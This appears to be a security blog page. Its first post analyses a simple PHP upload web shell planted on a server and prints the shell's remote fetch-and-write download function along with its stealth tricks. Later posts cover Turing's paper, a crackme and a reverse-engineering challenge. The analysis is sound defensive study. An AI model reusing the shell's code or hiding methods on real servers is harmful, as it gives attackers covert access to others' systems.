SAMPLE 28092020-1 : Ogretmenevi

Found: 28/09/2020

Working name: Ogretmenevi

Files

http://[REDACTED]/ogretmenevi/js/bootstrap.php

Description

  • Seems to be a very simple file upload script
  • No obfuscation at all
  • It hides by these mechanisms:
    • In order to access the functionality you need to know a random string that is passed with every request as a GET parameter.
    • Sets error_reporting to level 0.
    • It is installed/copied under a folder called “js” in an attempt to go under the radar.
  • The person who installed this malware renamed the index.html file of the directory to index.php without changing the content at all, maybe as a way to see if the server supported PHP or not before uploading the file.
  • Ogretmenevi is a place in Turkey. By doing a Google search, more instances of this malware with the same folder name can be found, which indicates that this string is not random but fixed, and the likely Turkish origin of the malware.

Tested Functionality

  • File upload via included form
  • File download (?)
    • In order to download a file, tries to first do a cURL, which means that it gets what the user sees through the browser or empty in most cases. If this cURL fails, then it does a file_get_contents, which has a similar behavior, as it is passed a URL in both cases.
function get($site, $dir) {
    $getf = curl_init();
    curl_setopt($getf, CURLOPT_URL, $site);
    curl_setopt($getf, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($getf, CURLOPT_TIMEOUT, 10);
    $data = curl_exec($getf);
    if (!$data) {
        $data = @file_get_contents($site);
    }
    file_put_contents($dir, $data);
}

Thoughts

  • Very amateur effort, especially the download part.
  • Use of very old HTML tags… like “font” (WTF?)

“Computing Machinery and Intelligence” by Alan M. Turing, annotated.

In this influential paper, published in October of 1950, Turing addresses the question “can machines think?” and develops concepts like the Imitation Game and the Turing Machine, of crucial importance on the development of the Theoretical Computer Science, even predicting problems that AI is facing today.

As I promised, I release my notes on the paper, hoping they help you.

You can download the annotated PDF here.

Crackme 1: Get The Password by HN1

Download URL: https://crackmes.one/crackme/5c9126c033c5d46ecd37c8f4

This crackme is a regular, non-packed PE executable, suitable as a starting point for people interested on the art of reverse engineering. It is a console application. After opening IDA to start the analysis, we can easily see that this program was written in assembly, as the structure is really straightforward.

Continue reading “Crackme 1: Get The Password by HN1”

Challenge 2

On the second installment of this reverse engineering series I present you with a new challenge. This time you are a secret agent, and you are on a very important mission. Some documents are stored on a locked safe that you have to open. There are some weird symbols and some green bars that oscillate up and down. Your intuition tells you that the safe will open when the three bars are full!

Now you start to think… this is the way, but how I am gonna make it happen?

If you decide to go and solve this challenge, please, tell me how you did it on an email (david@studiosi.es) and I will collect the solutions on a future post. Even better, do a write up, post it somewhere online and I will link to it here!

Hint

Time flies

Download it and have fun!